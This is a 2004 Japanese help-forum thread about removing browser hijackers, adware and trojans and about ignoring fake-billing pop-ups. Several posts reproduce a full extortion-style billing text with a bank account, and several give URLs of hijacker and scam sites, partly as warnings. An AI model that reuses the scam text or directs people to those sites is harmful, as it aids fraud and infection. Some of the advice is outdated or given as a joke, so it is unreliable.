初心者の皆、質問をする時にIDを出さないと こんなに沢山の偽者だ出てくるから ちゃんとIDを出そうね。
みんな、新ネタ待ってるぞ!!!
779 :
ひよこ名無しさん :04/09/05 00:08 ID:Umbu9+uB
インターネットをしていると、ときどきエロサイトの広告が 出てくるんです。とくにエロサイトを開いているわけでもないのに。 前に一度だけその手の広告で「OK」を押しちゃったことがあるんです 。ソレのせいかなと思ってるんですけど、どうしたらその広告が でてこないようにできますか?ブラウザはieでOSはWindowsXPです。 主な広告の内容はカリビアンコムです。
781 :
779 :04/09/05 00:11 ID:Umbu9+uB
>>781 テンプレはやりましたか、やってないのでしたら速やかに実行してみてください
カリビアンコムは無害じゃないの?
テンプレは美味いぞw
>>784 おじいちゃん、それはテンプラよ
一緒に帰ろうね
786 :
779 :04/09/05 00:23 ID:Umbu9+uB
>>782 すいません、まだテンプレはやってません。Spybotをインストして
実行してみたんですが、直らなかったので。
>>783 カリビアンコムは無害なんでしょうが、
たまに出てくるのがうっとうしくて。
>>786 Spybotだけで全部のスパイウェアが解決するぐらいなら、テンプレいらないでしょ。
そんな簡単じゃないから、コンパネから削除しろとかいくつも併用しろとか言うわけで。
789 :
ひよこ名無しさん :04/09/05 00:27 ID:2CQFen38
730さんありがとうございます。 閉じることの出来ないブラウザってどうやったら閉じれるんですか?
>>789 タスクマネージャーか、Alt+F4キー
791 :
ひよこ名無しさん :04/09/05 01:18 ID:lnuUYEOn
質問スレでこちらのテンプレを読めと誘導されましたのでこちらで質問させて頂きます。
windows XP使用しています。
Internet Explorerを立ち上げると下記にアクセスされます。
http://ez-finder.com/cgi-bin/index.cgi?c=1 ツールのオプション、全般でヤフーのアドレスを入力したのですが
何度やっても上記のアドレスにアクセスされます。
また、テンプレを読みWebのリセット等色々とやってみたのですがダメでした。
どなたかご助言願います。
マルチすみません。
>>791 テンプレを読めという誘導と、こっちで質問しろというのは違うと思うよ。
テンプレを読んで「色々やってみた」というのは、具体的にどれをやったの?
テンプレの
>>2-4 まで全部試して、それでもダメなら
>>5 やって相談するのが本来だよ。
やってないのがあるのならすぐ試しておいで。
>>791 http://ez-finder.com/terms.phpから To uninstall Look1 Search plugin
please go to START -> Settings -> Control Panel -> ADD/Remove Programs and Uninstall "SBSoft"
コンパネに「SBSoft」ってのがあるんじゃねーかな。
794 :
791 :04/09/05 01:34 ID:lnuUYEOn
>>792 「色々やってみた」と言うのは
>>2-4 まで見てみたり試したのですが
何分初心者なのでチンプンカンプンで…分かる範囲でやってみたと言うことです。
すみません…
>>793 コンパネに「SBSoft」って何でしょうか?
ぐぐってみたのですが外国のサイトが出てきて分かりませんでした。
>>794 コントロールパネル→ファイルの追加と削除、から削除しろ
>>975 訂正
× ファイルの追加と削除
○ アプリケーションの追加と削除
>>794 >分かる範囲でやってみたと言うことです。
で、その分かる範囲ってのはどこからどこまでだよ?
全然分からないから全くやらずに「助けて下さい」って言ってるだけじゃねーの?
ぬるぽん
>>テンプレみてわからないと言っちゃう奴 とっととリカバリ。これ最強。
800 :
791 :04/09/05 02:10 ID:lnuUYEOn
801 :
ひよこ名無しさん :04/09/05 02:31 ID:ysjtgOia
>>801 私はあなたの質問がネタに思えて仕方ないんですが。
>>801 このスレだけで、10回位出ているよ
心配なら警察に通報してください。
そろそろ業者が意図的に罠仕掛けてんじゃねーの 直リンする馬鹿もいるしよ
個人識別コード あなたのプロバイダーは Yahoo!BB です。 個人識別コード 1094316139 を登録いたしました 個人識別コードはPC個別に割り当てられている 個人情報を特定可能な次世代コードです ご利用期間 60日間 ご利用料金 \15000 振込先 UFJ銀行 新大阪支店 普)3599970 ミヤガワミノル 支払期限 登録日より4日以内 注意 支払期限以内にお振込み下さい。 また、支払い期限を過ぎても入金確認が出来ない場合、 規約に基づき 個体識別番号をもとに住所、氏名、電話番号をお調べし当番組管理部より 延滞料金30,000円、延滞1日に付き1,000円の損害金を加算して ご自宅、ご実家、勤務先などに直接請求されることがあります。 あなたの払込みID番号は 1094316139 です。 ご不明な点は、再度利用規約のページをご参照ください。
807 :
ひよこ名無しさん :04/09/05 02:39 ID:ysjtgOia
>>806 そう言えば、振込先の銀行に通報して
口座を無くさせた奴が居たな
809 :
ひよこ名無しさん :04/09/05 02:40 ID:cnH+pll6
>>809 遊ぶのは良いが、何か不都合が生じた時に
警察に調べられても知らないぞ。
少なくても、そのurlが詐欺行為に加担しているのを
知って貼って居るのだから
馬鹿がここで踏んで事件でも起したら、家まで警察は
調べに来るぞ。
812 :
ひよこ名無しさん :04/09/05 02:45 ID:ysjtgOia
>>810 一通り読みました、ご指摘のとおりですね
迷惑かけてすみませんでした
>>812 大した迷惑は掛けてないよ
安心して寝るよし
で、何人くらい払った人いるの?
こういう同じ質問が続くのはNEVADA以来だな
817 :
ひよこ名無しさん :04/09/05 03:49 ID:w7/U6gVs
>>817 ここは、スパイウエアを主に扱っているのね
だから、アンチウイルスが入っていることが前提で話をすすめるのです
取りあえず、オンラインスキャンをしてみようね、それで沢山ウイルスが
出てきたら明日アンチウイルスソフトを購入しようね。
>>817 98なら、
>>532 を試してみる手もあるな
98の場合は、レジストリーの復旧だからファイルは残るらしい
それでも、アンチウイルスソフトは買え
インターネットをする上での最低限の自己防衛手段だから
無防備で戦地に向かい、助けてくださいって言われても誰も
助けてくれないよ。
821 :
ひよこ名無しさん :04/09/05 04:29 ID:0x3Za3cb
スパイウエアとかアドウエアで DVDドライブとか壊れたりしますか? 急に焼けなくなりました。
>>818 >>819 何も知らないのに書込みしてすみませんでした。
親父のパソコンなので動転してしまいました…
今ノートン体験版をダウンロードしてます。
>>821 スパイウエアに感染すると、CPUパワーをそちらで使われるから
焼きに失敗する可能性は有るし、他にも悪さをしているようなので
焼けなくなる可能性はあるよ、あくまで可能性のはなしね
>822 持っていて損が無い数少ないジャンルのソフトなんだから買えよ! そんなんだから、痛い目に逢うんじゃねーか。
オレクシスの広告が消せません。 助けてください。 一応過去スレは眺めてみましたが、もし既出でしたらどのあたりまで遡ってスレ確認すればよいか教えてください。
>>826 テンプレに書いてあることを全部やる。全部だぞ。
830 :
826 :04/09/05 14:34 ID:???
>827,828 レスありがとうございます。 消せたかどうかはまだ確認できませんが、本当にありがとうございました。
質問スレからこちらに誘導されて
スパイウェア駆除しまくって
テンプレ一通りやって改善されないので質問します。
IE起動時、非起動時関係なく突然Iブラウザが開いて下記の広告ページが表示されます。
ttp://adv1.eblocs.com/spyblocs/adv/dmedi_002.html その他にも何種類かありますが ほとんどがこれです。
関係あるかどうか解りませんが、タスクバーに
インストールした覚えのない Enter Search Termsという
検索ツールが常駐していて消えません。(普段は検索バー内に時計)
解決方法を教えて下さい。
>>831 >>1 の質問の仕方も守ってない奴は釣りっぽい臭いしかしない
本当に困ってるなら、騙る馬鹿いるからちゃんとルールはまもっとけ
テンプレ全部やったなら、
>>5 のHijackThisをやってここに貼ってみる
ネタスレage
>>831 HijackThis をやると、テンプレしてないのがばれちゃうぞ
ちゃんとやっとけよ
836 :
831 :04/09/05 18:03 ID:???
なんとか 解決したっぽいです。 ご迷惑をおかけしました。
話がつまらない奴のガイドライン 5.同じネタを何度も繰り返す
やばい、テンプレ全部やってねーや、やらないとまずいな
↓
あれ、テンプレやったらあっさり解決しちゃった
↓
>>836
840 :
ひよこ名無しさん :04/09/05 19:21 ID:oCc16/ul
お客が来ないとジエンShowか。
843 :
840 :04/09/05 19:54 ID:???
>>841 過去ログも見ずに書き込みしたこと大変申し訳ありませんでした。
その「無視していい」というのは「皆、こいつ過去ログも見てないから無視していいよ」
という意味なのか、「そのアドレス踏んでも気にせず無視してればいいよ」という意味なのかどっちなのでしょうか?
>>364 氏も同じ事態に陥っていたみたいなのでその辺のレスを参考に、
何かおかしくされたとか、変なもん送られてきたとか無さそうなので、無視しようという結論に達したのですが。
>>843 「そのアドレス踏んでも気にせず無視してればいいよ」
845 :
840 :04/09/05 20:04 ID:???
>>844 なるほど、わかりました。
こういったことは初めてだったのでいい経験になったと思い込むことにします。
ありがとうございました。
あと、スレ汚しごめんなさい
☆。:.+: /■\ .. :. ( ・3・ ) 君とよくこの店に 来たものさ♪ / ̄ヽ/,― 、\ o。。。 訳もなくお茶を飲み 話したよ♪ .:☆ | ||三∪●)三mΕ∃. .:* \_.へ--イ\ ゚ ゚ ゚ +:..♪.:。゚*.:.. (_)(_) ☆。:.+: ☆。:.+::.. ☆:.°+ .. : 。*.:☆゚x*+゚。::.☆ο::.+。 *ρ
847 :
ひよこ名無しさん :04/09/05 20:34 ID:ykkQxTKG
すいませんH画像見てたら
ホームページの設定がおかしくなったんです。
http://hot-search.biz/index.html になってしまうんです。
OSはXP セキュはノートン
SpybotとCWShredderを試してみました。
復元ポイントってのはこういう状態
になった以前にありませんでした。
よろしくお願いします。
お、おまえら〜
窓の手使え ,/|ミ=、 / .|ミミミ| .| |ミミミ| ,/|ミ| |ミミミ| ,/ |ミ| |ミミミ| | |ミ| |ミミミ| | |ミ| |ミミミ| | |ミ| |ミミミ| | |ミ| |ミミミ| | |ミ| |ミミミ| _,-'"|. |ミ| |ミミミ| _,. -'' " ̄~゙三=-_、_ _,.-'" |. |ミ| !ミミミ| ,,.-''" r _、 三三タ_,.-''" | |ミ| ,.彡ヾミ| / i {ぃ}} _ニ/ -=三| 」ミヒ彡彡イミヾ /,.、 `--" ニl -=ニ三=-''レ彡ミミr'" |ミミミ| l {ゞ} i .ニl==三三ニ=''" ,>'"|ミ| |ミミミ| .l `" i_,,...-''| ニ`=-=i'" | |ミl,..-=彡ヾミ| _,.-! ! i -ニ三三/ L.. -ニヾ|ヾ彡'='''" l´,.- l \/ -ニ三三/ ヾ-‐''" _. ! ri l\ __--三三三='" j'‘´l `´ | ! ` ミ三三三三三=''" i',.. '´} | | l,.. r´ '´ }
>>847 ノートンの定義が最新のものになっているかどうか確認後スキャン
コントロールパネルに変なものがないかどうか確認
Ad-awareSEを使ってスキャン&駆除
それでもダメならHijackThisやってここに貼る
853 :
ひよこ名無しさん :04/09/05 21:42 ID:1pvs8ReF
854 :
ひよこ名無しさん :04/09/05 21:49 ID:RIobrqbl
serach toolbar ってのがスタートページの上部に設定されてしまいます。 メインの画面には C:\WINDOWS\SYSTEM32\IEsp.mhtというアドレスで 表示はTODAY TOP100SERCHS と表示されてます。 いわゆるabout blank系のものかと思います。 OSはXPです。実は前にMEをつかっててときにも同じようなこと があっていろいろソフト使ったが駄目で、結局ウインドウズアップデイト しただけで治りました。今回は駄目です テンプレで紹介されてるスパイボット、CWシュレッダー、ADーAWARE はすべて使用しました。いろいろ削除して、前よりよくはなりました 前は「ここをクリック」みたいな通常のリンクさえたどれなくなっていたのです しかしどうも根っこの部分に何かあるようです。 もう半日これに悩んで、とほほです。 なにかアドバイスありますでしょうか?
>>854 アンチウィルスソフトを入れてスキャンするか、オンラインスキャンを試してみる
コントロールパネルのアプリケーションの追加と削除に変なものがないかどうかを確認
それでもダメならHijackThisやってここに貼る
856 :
ひよこ名無しさん :04/09/05 22:07 ID:RIobrqbl
うおおおおおおおおおおありがとうございます 今見たらアプリの中に ドンズバtoolbarってのがあった。 しかしもうひとつ怪しいのが Winad client これも削除していいんでしょうか?
857 :
855 :04/09/05 22:10 ID:???
>>856 >>855 はテンプレに書いてある範囲の事なんだけど(--;
覚えがないものは全てアンインストールした方がいいよ
858 :
ひよこ名無しさん :04/09/05 22:11 ID:RIobrqbl
859 :
855 :04/09/05 22:15 ID:???
>>858 複合感染しまくってるだけだと思う
あと、アンチウィルスソフトが入っていないと、せっかく駆除しても
トロイがまた同じ物をダウンロードする事もよくある
テンプレを良く読んで、一通り全部の作業を終わらせる事を推奨する
860 :
ひよこ名無しさん :04/09/05 22:16 ID:RIobrqbl
ウイルススキャンは入ってはいるのですが エラーというか不能状態です。 ただこのスレで聞くと起こられるかと思って・・。 普通PCを起動すれば自動で起動するはずなのにしないんです 手動でするとどの項目も「現在無効 危険」見たいな表示で 「有効にする」 をクリックすると再インストールしてください って出ます。その繰り返し
861 :
ひよこ名無しさん :04/09/05 22:19 ID:RIobrqbl
ウイルスについては専用スレで聞いてみます ありがとうございましや。
862 :
855 :04/09/05 22:19 ID:???
>>860 どこの会社のアンチウィルスソフトかわからないが(McAfeeあたりか?)、
そういう不自然な段階で既にウィルスが何かシステムをいじってるって事。
再インストールしろと言われているなら再インストールして、最新の定義にアップデートして、
その後に一度全部のファイルをスキャンしないと無意味。
863 :
ひよこ名無しさん :04/09/05 22:22 ID:0pH/QL2t
OSはXPをつかっているのですが、jpgをクリックしたか何かしたら、 Outlook Expressがどうとかと出て、何かダウンロードされたかもしれないんですが、 その確認と削除はどうやるのかどなたか教えてください。
864 :
ひよこ名無しさん :04/09/05 22:33 ID:capUQnau
Windows98でIEで普通のサイトみてたらたまに表示できませんていうウィンドウが 無限にでてくるんですけどどう対処すればいいんですか?
もっとネタ質問キボンヌ。
866 :
ひよこ名無しさん。 :04/09/05 23:12 ID:MrDAUQpO
ツール→インターネットオプションの全般の「標準設定」や「空白の使用」 が薄字になっていて出来ません プログラム→「web設定のリセット」もやはり出来ません また、全般→「アドレス」がホームページがmki@msitstore:c¥spe¥〜となってるのですがこの場合どうすればいいでしょうか?
>>846 ぼるじょあ一部の人、貴方は何歳ですか?
868 :
ひよこ名無しさん :04/09/06 00:21 ID:laYI9s8A
教えて下さい。 coolwebの系統のウイルスに感染したみたいなんですが 上記テンプレ試そうとしてもデスクトップのアイコンダブルクリックしても 真っ白になってしまいます。(マイコンピュータやダウンロードしたウイルスのソフトも) I個のオブジェクトと表示はされているので消えているのではなく真っ白でクリックできないのです どうすればいいでしょう
>>867 (・3・) エェー 今年で67歳ですYO
>>870 同年代かと思いましたが、人生の先輩でしたか、
今後ともご指導よろしくお願い致します。
ご返答ありがとうございました。
(・3・) エェー どう致しましてだYO 最近、前立腺肥大で大変なんですYO
873 :
ひよこ名無しさん :04/09/06 01:59 ID:NVnI3Wyc
スパイウェアやウィルスの退治を全てしたのに 「c'ant prepare plugin 」 と言う表示が何度も出て困っているのですが どうしたら良いのでしょうか?教えてください。
スッ惚けた野郎だな、ぼの字って奴は。
875 :
ぼの字 :04/09/06 02:10 ID:???
ぼの字
ぼるじょあは名無しでは性格が激変するから騙されてはいけない。
↑ウィルス注意!!!
CoolWebSearch系統のウィルスにかかってしまい、 ここを参考に何とか復旧したのですが、 windows起動時にwmplayerが起動するという現象が解決できません。 テンプレは一通り試したと思うのですが、何が悪さしているのでしょうか? 2kです。
>>878 ウイルスじゃないよ(埋め込まれていたら別だけど)
個人セキュリティ情報広場 という掲示板でした
エロサイト見たら・・・助けて下さい!Part40
エロサイトに限らずWEBを見て回ってたらブラウザ乗っ取られて大変なことに…
いったいどうしたらいいの?って人のためのスレッドです。
▼━質問のしかた ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
・ E-mail欄(省略可) には何も記入しないこと。(ID出す→偽者対策・質問者の区別)
・ 2回目以降の書込は、名前欄に最初に質問した際の「発言番号」を入力すること。
・ 他のスレから誘導された場合は、その旨書く。(マルチポストとの区別)
・ OSの種類、ブラウザ、セキュ関係ソフトの有無、実行結果を報告。(特にOSの種類)
・ 質問の前にまず、テンプレの
>>2-12 あたりを必ず読んで、自分で考え実行すること。
▼━回答者の方へ ━━━━━━━━━━━━━━━━━━━━
・ テンプレの方法を実行せずに質問する人は、徹底放置して下さい。
・ 出された指示を実行せずにレスする人は、徹底放置して下さい。
・ HijackThisの分析から嘘が判明した場合は、徹底放置して下さい。
・ 放置ができない回答者は、質問者が自作自演していると見なされます。
▼━禁止事項 ━━━━━━━━━━━━━━━━━━━
・ マルチポスト(複数の板・スレで同じことを質問)
・ 情報の小出し(始めにOSやソフト名等を必ず明示)
・ 違法な話題や質問(WinMX,Winny,エミュレータ等)
・ Opera房立ち入り禁止。HNを変えてもダメです。またその話題も違法です。
883 :
879 :04/09/06 07:19 ID:???
>>880 お返事ありがとうございます。
再インストールしてみたのですが、まだ勝手に起動してしまいます。
メモ帳の起動も問題ありませんでした。
わかりましたらよろしくお願いします。
エロサイト見たら・・・助けて下さい!Part40
エロサイトに限らずWEBを見て回ってたらブラウザ乗っ取られて大変なことに…
いったいどうしたらいいの?って人のためのスレッドです。
▼━質問のしかた ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
・ E-mail欄(省略可) には何も記入しないこと。(ID出す→偽者対策・質問者の区別)
・ 2回目以降の書込は、名前欄に最初に質問した際の「発言番号」を入力すること。
・ 他のスレから誘導された場合は、その旨書く。(マルチポストとの区別)
・ OSの種類、ブラウザ、セキュ関係ソフトの有無、実行結果を報告。(特にOSの種類)
・ 質問の前にまず、テンプレの
>>2-12 あたりを必ず読んで、自分で考え実行すること。
▼━回答者の方へ ━━━━━━━━━━━━━━━━━━━━
・ テンプレの方法を実行せずに質問する人は、徹底放置して下さい。
・ 出された指示を実行せずにレスする人は、徹底放置して下さい。
・ HijackThisの分析から嘘が判明した場合は、徹底放置して下さい。
・ 放置ができない回答者は、質問者が自作自演していると見なされます。
▼━禁止事項 ━━━━━━━━━━━━━━━━━━━
・ マルチポスト(複数の板・スレで同じことを質問)
・ 情報の小出し(始めにOSやソフト名等を必ず明示)
・ 違法な話題や質問(WinMX,Winny,エミュレータ等)
・ 天麩羅屋 & 薮パソユーザーは立ち入り禁止。HNを変えてもダメです。
・ Opera房立ち入り禁止。HNを変えてもダメです。またその話題も違法です。
∧ ∧ / ヽ ./ .∧ / `、 / ∧ Opera最高〜 /  ̄ ̄ ̄ ヽ チッ・・・よく見破りましたね。 /::::::::: .\ /:::::::::: ヽ-=・=-′ ヽ-=・=- ∧/ ∧ ヽ::::::::::: \___/ / ヽ / ヽ ヽ:::::::::::::: \/ / ヽ_____/ ヽ / / \ | / ヽ | '''''"´) ● \─/ ● |'´) \ -‐´ ヽ/ /´ | | \ /
886 :
879 :04/09/06 10:10 ID:???
HijackThisをupdateしたら簡単に見つかった。( ´,_ゝ`)シネヨ俺
887 :
ひよこ名無しさん :04/09/06 11:33 ID:2Kfn38GL
Windows 98を使っています。先日海外のゲームサイトに行ったとき パソコンがおかしくなってしまいました。パソコンは動くのですが トップページが海外の検索のところになっていたり、サイトを見よう すると海外のアダルトサイトが勝手に出てきたりします。ウィルス セキュリティも反応しません。 誰か助けてください。お願いします。
>>887 OSの再インストールするんで質問取り下げます
460 名前:458 投稿日:04/09/06 11:36 ID:2Kfn38GL
すみません。OSの再インストールってどうやるんですか?
よかったら教えてください。
889 :
877 :04/09/06 12:14 ID:2Kfn38GL
再インストール以外に方法ないですか?
(((((((( ;゚Д゚)))))))ガクガクブルブルガタガタブルガタガクガクガクガクガク
おい思うんだけど
>>891 みたいな直リンは削除してもらった方がいいんでねーの?
>>891 >リカバリーは回答外です
从リ ゚д゚ノリ ハァ? 何言ってんのデブ
(((( ;゚ρ゚)))アワワワワ
ゆるしてあげて。
900ゲット
今話題の cat-e.be から画像を全部ダウンロードしたのですが、 画像のサイズもファイルサイズも無駄に大きいし いまいちヌけないし、困っています。助けてください!! OSはWindowsMeです。 あとついでに画像の女の子たちですが、せっかくえちぃ写真撮ったのに こんな使われ方をしてるので不憫でなりません。 どうすればいいですか。よろしくお願いします。
>>901 取り合えずテンプレやって、それでも改善が見られない場合は
HijackThis で、雑念をFIXする。それでも駄目ならリカバーして
少しのエロでも萌えれた純真な心に戻す。
直ったら、エロはいつも更新して最新の情報を保つ事を忘れるな
それでも駄目なら、本家の貞さんに相談しろ
903 :
ひよこ名無しさん :04/09/06 17:03 ID:ah4XTMdp
about:blankのsearch for 型にやられてテンプレにあるサイトの通り search forで右クリックしてソースを出そうと何度も試みたのですが 肝心の「search for」のページに限って右クリックが反応しません。 どうすればよいでしょうか
n
やっと書けました。 ジャバスプリクトに詳しい人いませんか?
907 :
906 :04/09/06 17:30 ID:IVkY07Ha
テンプレはすべて試しました。
アド・アウェアと2004バスターは反応なしです。
OSは、MEです。
感染してたプログラムの一部コピペしたんでジャバスプリクトに詳しい人教えてください。どんなプログラムですか?不安でつ。
<html><head><meta http-equiv="MSThemeCompatible" content="Yes"><meta http-equiv="PICS-Label" content='
(PICS-1.1 "
http://www.rsac.org/ratingsv01.html "; l comment "RSACi North America Server" by "
[email protected] " r (n 0 s 0 v 0 l 0))'>
<meta http-equiv="Content-Type" content="text/html;charset='utf-8'">
<title>Internet Explorer 縺ョ讀懃エ「</title><link rel="stylesheet" type="text/css" href="/cfgs/cfg/css/ja_CSS_Classic.css"/>
<object id="saOC" CLASSID="clsid:B45FF030-4447-11D2-85DE-00C04FA35C89">
</object><script language="JScript.Encode" src="/static/srchcommon.enc"></script><script language="JScript.Encode" src="/static/srchasst.enc">
</script><script defer for="saOC" event="OnNextMenuSelect(idx);">
nextSearch(idx);</script><script defer for="saOC" event="OnNewSearch();">newSearch();</script><script language="javascript">
var loadingMsg = "讀懃エ「險ュ螳壹r隱ュ縺ソ霎シ繧薙〒縺・∪縺・..";var specifyMsg = "讀懃エ「蟇セ雎。繧呈欠螳壹@縺ヲ縺上□縺輔>!";
</script><script language="javascript">var c, s;c = new Category("Web", "Web 繝壹・繧ク縺ョ讀懃エ「(<u>W</u>)");categories.add(c);s = new Subcategory
909 :
ひよこ名無しさん :04/09/06 21:45 ID:ZDEI52oq
http://g51.jp?c=1 ここのサイトにアクセスして、ちょっとエロ写真見たんですが、
そしたらIPとか抜かれて、35000円請求!と出てきました。
どうしたらよろしいですか!?
>>909 ま た 次 世 代 コ ー ド か
こんなんで個人特定はできないから無視
911 :
ひよこ名無しさん :04/09/06 21:49 ID:ZDEI52oq
>>910 まじすか!?あーよかったー。
ただの脅しみたいな感じですかね。
PC知識が無いから焦りました。。。
>>911 腹が立ったなーと思ったら、振りこみ先の銀行に電話するかメールして、
こういう架空請求口座がおたくの銀行で開かれてますよーと通報すれば
即座に銀行が口座閉鎖してくれる。あとは警察にでも通報しとけ。
間違っても振りこんだりしちゃダメ。
913 :
ひよこ名無しさん :04/09/06 21:57 ID:RtsMNu12
anout blank系のウイルス?を除去したいのですが (ちなみに昨日もここで親切な方に聞きました) ウイルスセキュリティー2004がインストールされると フレッツ接続できなくなるんです 「TAPが見つかりません」とか出るんですけど どうしたらインストールできるんでしょう。 AD−AWARE、スパイボット等は使ったんですが 完全には除去できないんですよ ウイルスセキュリティーもAD−AWAREも UPDATEしなきゃならないと思うんですが 何にせよウイルスセキュリティを入れて ネット接続するって言うのができないんですよ。 せっかくXPにしたのに・・・。
>>913 ソースネクストを一旦アンインストールして、他のものを全部終わらせろ。
ウィルスのチェックは、
>>3 のオンラインスキャンで代用。
特にスレで不具合報告とかないみたいだけど、糞ースネクストの仕業っぽいな(;´Д`)
915 :
913 :04/09/06 22:09 ID:???
916 :
ひよこ名無しさん :04/09/06 22:13 ID:RtsMNu12
ありがとやんす アンインストールすればフレッツ接続できるんですよ だからこそあやしいというか・・・。 AD−AWARE等のソフトは何回検索しても引っかかるんですよ だからやはりウイルス対策の最新版が・・・ オンラインスキャンもやろうとしてるんですけど できない・・・。 とりあえずもう一度スパイボット等をつかってみます。
>>916 これ見た?
http://sec.sourcenext.info/support/qa/040830_02.html Q. インストール直後やパソコンを使用中に、インターネットに接続できなくなってしまったのですが?
A. 以下の手順に沿って最新の「ウイルスセキュリティ」をインストールしてください。
1. 「ウイルスセキュリティ」をアンインストールしてください。インターネットに接続することができるようになります。
2. こちらから手順に従って最新の「ウイルスセキュリティ」をインストールしてください。
※今後、再度「ウイルスセキュリティ」をインストールする場合は、現在お持ちのCD-ROMやダウンロード版のファイルから
インストールせずに、こちらから最新の「ウイルスセキュリティ」をインストールしてください。
918 :
914 :04/09/06 22:38 ID:???
>>917 ソレダ!!(・∀・)
さすが糞ースネクスト・・・
個人的には「全くないよりはマシかな」程度で、こういうトラブルも多いので
今回直した後に、別のフリーアンチウィルスソフトに乗りかえるのを薦めますよ
919 :
ひよこ名無しさん :04/09/07 01:35 ID:8Aq8HYcL
>917先生 試しましたが 同様にだめですた。・・・ いったいどうしたら 今日はもう涙濡れて寝ます。
>>919 だめなら、ソースネクストは一旦アンインストールして、
ウィルスのスキャン・駆除はオンラインスキャンでやるしかないでしょ。
ま、今日はゆっくり寝て、明日以降にがんがれ。
921 :
ひよこ名無しさん :04/09/07 02:10 ID:lAaAmt3r
>>921 さんざん既出。個人は特定できないので、支払い不要。
923 :
921 :04/09/07 02:27 ID:???
ありがとうございます、過去ログしっかり読んで来ます。
最近架空請求ネタが多いので、他のスレからピックアップしてみました 現在確認されている、架空請求サイトらしい お気をつけ下さい。 ┌───────────────────┐ │ www.ahland.net/member/index.php .│ │ www.i-pode.com/member/index.php ..│ │ www.eropon.org/member/index.php │ │ www.cat-e.be/member/index.php .... │ │ www.sweet-pad.com/member/index.php │ │ vfsum.biz/docomo/ │ └───────────────────┘
cat-eは既出すぎるのでNGワード放りこんでしまったり・・・ レスついてると「あー、また次世代コードか」と思う程度な罠
スパイウェアを完全に削除するにはPCを買い換えなくてはいけないんですか? ダウンロードしたスパイウェア削除ソフトでも 一定時間後に削除したファイルは復活するし IEを起動するたびにまた同じことの繰り返しで... あらゆる設定をリセットしても直らないんですから買い替えですよね?
>>926 >一定時間後に削除したファイルは復活するし
アンチウィルスソフトは入ってる?こういう場合はトロイを疑うといいよ。
トロイが仕込まれていて、スパイウェアをダウンロードしちゃうパターンね。
あとTrackingCookieが復活するのは、SpywareBlaster使えばだいぶ防げるよ。
セキュリティ板にスレッドがあるからそこを見て導入しる。
930 :
ひよこ名無しさん :04/09/07 04:59 ID:w10jiQ4x
lavasoft アップされてるですか。
ソースネクストダメだったんですね... SpywareBlasterは導入済みなんですが一向に問題が解決しません
>>931 SpywareBlasterは、既に入り込んでしまっているスパイウェアには何の意味もない
あれはあくまでも、新しくインストールされるのを防ぐだけ
テンプレへレッツGO。
933 :
ひよこ名無しさん :04/09/07 09:28 ID:9r8kMqvY
スンません。お聞きしますけど クリックが変になっちゃって、例えば「ブラウザのもどるボタン」 一回クリックしただけなのに、その前の前に戻っちゃったり するんですけど、治し方ご存知の人教えていただけますか?
935 :
ひよこ名無しさん :04/09/07 13:18 ID:uKYKQLHl
すれ違いなんですけどお願いします。携帯からアクセスしたと同時に入会してしまうタイプのエロサイトではアクセスと同時にこちらの情報は読まれているんでしょうか?
936 :
ひよこ名無しさん :04/09/07 18:21 ID:ng00P/lp
win98se IE セキュリティソフトはありません 昨日ダークロリータってのにひっかかってトロイがたくさんです。 どうやらテンポラリーファイルの中に入っているようなんですが中身を消しても消えません。 この機会にセキュリティソフトを入れるつもりですが、それまでにしておく事は無いでしょうか? シマンテックのサイトに「勝手にメールを送信したり・・・」 とあったので友人に迷惑かけないかと心配です。
>>936 セーフモードで削除できないか
セキュリティソフトってアンチウイルスソフトは
入っているのか?
しておくことは、ネット回線を抜いておけ
938 :
ひよこ名無しさん :04/09/07 18:34 ID:ng00P/lp
>>937 それだ!初めてリアルで使える時がきました
海鮮斬って9尾釣ってきます
アンチウィルスも入れてません。スパイウェア除去だけですんで。
セーフモード試してみます。御助言ありがとうございました。
940 :
ひよこ名無しさん :04/09/07 18:45 ID:WUvX8XVd
>>938 コラ コラ コラ〜
スパイウエア以前の問題ですね。
アンチウイルスソフトを即効購入しろ、でもウイルスが入っているHDに
インストールしても意味が無いぞ。必要なデータをバックアップして
リカバー前提で話を進めた方が良いぞ。
>>940 個別な対処法分からないけど、
システムの復元が出来るなら試してみる
駄目なら他のスパイウエア除去ソフト
>>3 6) 7)を試してみる
943 :
ひよこ名無しさん :04/09/07 19:12 ID:ng00P/lp
>>941 そうなんですか?なんかノートンのサイトには「ウィルスが発見されたらソフトで除去」
みたいに書いてあるから買えば何とかなると思っていました。
とりあえずリカバリも初めてなんでリカバリ関係のサイト眺めてからケーブル引っこ抜きます。
どうもありがとうございました。
944 :
854 :04/09/07 19:24 ID:JhDeM27o
結構ここで聞いてますすいませんたびたび about blank系のトラブルなんですが、 スパイぼっとやAD-AWAREなどを何度もつかっているうちに 今朝、フレッツ接続ツールを立ち上げると ウイルスセキュリティーをあえて抜いているのに TAPが利用できません などと表示され ついでに接続アイコンをクリックすると アダプタが見つかりません というようなメッセージが出るようになってしまいました 通常だと接続の詳細のところに[ナントカethernet board] とかあるじゃないですか あそこが空欄になってて・・・。 LANボードのドライバはもちろん再インストールしたんですが 同じ状況です ちなみに今は漫画喫茶にいます。
>>944 > about blank系のトラブルなんですが、
たぶん問題は他に有るんじゃないか
もう、OS毎再インストールしたほうが良いんじゃないか
ネットワークアダプターは、デバイス マネージャーで
使えるようになっているか確認してみたら
946 :
854 :04/09/07 19:59 ID:JhDeM27o
AD=WAREとかって 必要なファイルまで削除してしまうってこと あるんですかね? もう人生に疲れた・・・ このトラブルが俺の人生を狂わせた
948 :
854 :04/09/07 20:04 ID:JhDeM27o
OSは再インストールしてみますか・・・。 うううううううううううううううううううううううう ちきしょうめ」」 俺は負けないぞ
勝手にしてくれ
>>946 システムファイルが書き換えられた時点で、死んでいる事に気づけ
または、重要ヶ所のレジストリが書き換えられた時点で既に死んでいる事に気づけ
>>946 根本的に間違ってる。
Ad-awareが必要なファイルを削除したんじゃなくて、
その入り込んだ悪いファイルが書き換えてるだけだろ
952 :
ひよこ名無しさん :04/09/07 22:57 ID:Phm20Wo8
海外サイトで思い切りトロイにやられたようなんですが。AVGが反応して AVG resident shield virus trojan horse downloader.Istbar.4.ag is found in file c:\windows\temp\icd6.tmp\istactivex.dll と出て、即再起動。普通に立ち上がるもののネットやってるとまた上の文が出て落ちます。 バスターの評価版をダウソしスキャンしたら、数個ウイルスを検知。 その後も度々上の文章が出てくるんですがどうしたらいいでしょうか・・
>>952 なんだ 親玉ファイルがいるのか
それは子供
>>952 バスターの評価版で出てきたウィルスを手動駆除すればいいじゃん。
